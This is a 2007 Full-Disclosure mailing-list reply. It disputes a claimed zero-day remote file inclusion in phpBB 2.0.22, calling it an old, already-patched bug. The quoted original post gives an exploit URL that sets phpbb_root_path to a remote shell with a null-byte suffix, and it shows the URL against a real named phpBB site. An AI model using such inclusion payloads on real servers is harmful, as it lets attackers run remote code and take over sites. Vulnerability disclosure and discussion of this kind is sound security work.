[Full-disclosure] [RE: 0DAY RFI in phpBB <= 2.0.22 HOT]
jeroen
nowhereman at moenen.org
Wed Jun 6 20:48:59 BST 2007
AFAIK this is a very old bug and has been fixed in all modules?
I've tested your vuln against a few installs of phpBB and can't
reproduce it... so seems it's been patched allready?
http://archives.neohapsis.com/archives/vuln-dev/2002-q1/0981.html
Regards,
Jeroen
-------- --------
From: dr.rezen at gmail.com
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] 0DAY RFI in phpBB <= 2.0.22 HOT
Date: Fri, 01 Jun 2007 13:05:01 -0400
New bug found in phpBB, most pages vulnerable, theres more bugs, I\'ll post one a week:
victim/phpBB2/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
For example:
http://www.phpbb.de/includes/functions_post.php?phpbb_root_path=[remote.shell]%00
Enjoy :)
BUG BY REZEN! XORCREW! H4X H4X!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070606/62a88d63/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.